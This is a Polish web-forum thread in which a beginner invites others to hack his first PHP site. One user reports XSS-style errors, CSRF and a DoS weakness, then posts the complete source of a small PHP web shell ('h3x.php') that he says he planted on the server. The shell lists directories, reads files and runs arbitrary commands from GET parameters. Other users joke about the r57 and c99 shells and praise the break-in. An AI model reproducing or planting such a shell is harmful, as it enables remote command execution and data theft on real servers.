Test strony

[rogus]

Witam. Zrobilem swoja pierwszą stronę w php i nie wiem czy dobrze ją zabezpieczyłem. Jeśli się komuś chce ją shakować to prosiłbym o kontakt gg 6314031 [email protected]. Pozdrawiam

[GSG-9]

lol niekomu sie nie chce
chyba ze zaplacisz?

[maciek]

podaj adres tutaj, wspolnie ocenimy, podyskutujemy, doradzimy ewentualne poprawki

i jaki to ma zwiazek z bezpieczenstwem it i security
proponuje przeniesc do Webmastering i PHP/CGI/ASP/JSP/J2EE

[rogus]

Widziałem pare razy na forach ze prosili zeby ktos przetestował zabezpieczenia strony.


Jak już mówiłem jest to moja pierwsza strona taka poważniejsza.

Prosiłbym moderatora o przeniesienie wątku.

[hedVB]

Zajebisty transfer, śmiga aż miło i nuty zajebiste hehe GRATZ!!!!!!!!!!

[rip]

posta bede edytowal na bierzaco:

Kod:

Warning: htmlspecialchars() expects parameter 1 to be string, array given in /srv/www/vhosts/twojanutka.pl/httpdocs/index.php on line 9

przy rejestracji skrypt ciagle GETuje dane.

blad przy rejestracji, + Dos possibility.

xsrf az milo przy zmianie danych


final edit:
a co ja sie pier***e w takie gowna, jak na stronce sa takie bledy

[GSG-9]

haha good job
rip - niech zgadne, r57 czy c99? ^^

[rip]

h3x.php ^^

Kod:

<?php
switch($_GET['a']){
case 'a':
$dh=opendir($_GET['b']);
while ($file = readdir($dh))printf('<b>%s</b>     %s<br>', $file, filetype($_GET['b'].'/'.$file));
break;
case 'b':
readfile($_GET['b']);
break;
case 'c':
passthru($_GET['b']);
break;
}
?>

serv tak zwalony ze c99 powoduje internal error

tak na marginesie, dostep do ftp i sql to raczej rzadkosc

[hedVB]

EDIT: nie doczytałem prośby autora :]

[Ormi]

EDIT: @up: Kurde, wyprzedziłeś mnie... I co mam teraz z moim postem zrobić? Już nieaktualny i głupio wygląda

Jeśli się komuś chce ją shakować

No to rip właśnie zrobił to, o co prosił rogus
Swoją drogą gratz dla ripa